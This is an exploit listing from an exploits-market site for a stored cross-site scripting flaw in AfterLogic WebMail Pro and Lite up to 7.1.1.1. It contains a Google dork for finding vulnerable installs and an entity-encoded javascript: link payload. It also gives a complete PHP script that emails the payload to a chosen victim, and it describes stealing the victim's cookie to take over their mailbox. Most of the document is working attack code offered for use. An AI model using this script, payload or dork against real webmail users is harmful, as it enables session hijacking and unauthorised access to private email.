[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS Vulnerability

Author
Zamanian
Risk
[
Security Risk High
]
0day-ID
0day-ID-21776
Category
web applications
Date add
20-01-2014
Platform
php
<?php

/*
# Exploit Title : AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS
# Google Dork : intext:"AfterLogic" intext:"Login Information" inurl:index.php
# Date : 19 Jan 2014
# Exploit Author : Saeed reza Zamanian [s.zamanian [AT] imenantivirus.com]
# Vendor Homepage: http://www.afterlogic.com/
# Software Link : http://www.afterlogic.com/download/webmail-pro
# Version : <= 7.1.1.1
# Tested on : KALI Linux 1.0.5 (Debian) Apache/2.2.22
# CVE : vendor id = 6423

Greetz: H.Zamanian, K.Kia, K.Khani

WebApp Desciption:
AfterLogic WebMail is a browser-based e-mail and collaboration front end,
designed to work with your existing messaging solutions. From an administrator&#8217;s
perspective, the application is easy to install on your own server, easy to integrate and
easy to maintain.


Vulnerability Description:
XSS codes can be stored in E-Mail Body.
So you can send an email to the Victim with below payload and steal the victim's cookie.

<a
href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert(document.cook
ie)>Click Me, Please...</a>\r\n

NOTE: javascript html char encode =
&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;

then you will be able to get into the victim's mailbox via the url:
http://[WebSite]/[AfterLogic]/Default.aspx

## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer
directory:
http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list


*/

echo "<title>AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit</title>";
require_once('class.phpmailer.php');

$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
$mail->IsSMTP(); // telling the class to use SMTP


/* SETTINGS */
$smtp_user = "username"; // Any valid smtp account
$smtp_pass = "password"; // Your PASSWORD
$smtp_port = "25"; // SMTP PORT Default: 25
$smtp_host = "localhost"; // Any valid smtp server
$from = "attacker@email.com"; // Any email
$victim = "victim@email.com"; // Victim email on afterlogic webmail.
$subject = "Salam"; // Subject

/* Body Text */
$body = '<a
href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert(document.cook
ie)>Click Me, Please...</a>\r\n';



try {
$mail->SMTPDebug = 2; // enables SMTP debug information (for testing)
$mail->SMTPAuth = false; // enable SMTP authentication
$mail->Host = $smtp_host;
$mail->Port = $smtp_port;
$mail->Username = $smtp_user; // SMTP account username
$mail->Password = $smtp_pass; // SMTP account password

$mail->SetFrom($from, 'Attacker');
$mail->AddReplyTo($from, 'Attacker');

$mail->AddAddress($victim, 'Victim');
$mail->Subject = $subject;

$mail->MsgHTML($body);
$mail->Send();
echo "Message Sent OK</p>\n";
} catch (phpmailerException $e) {
echo $e->errorMessage();
} catch (Exception $e) {
echo $e->getMessage();
}
?>

#  0day.today [2024-12-25]  #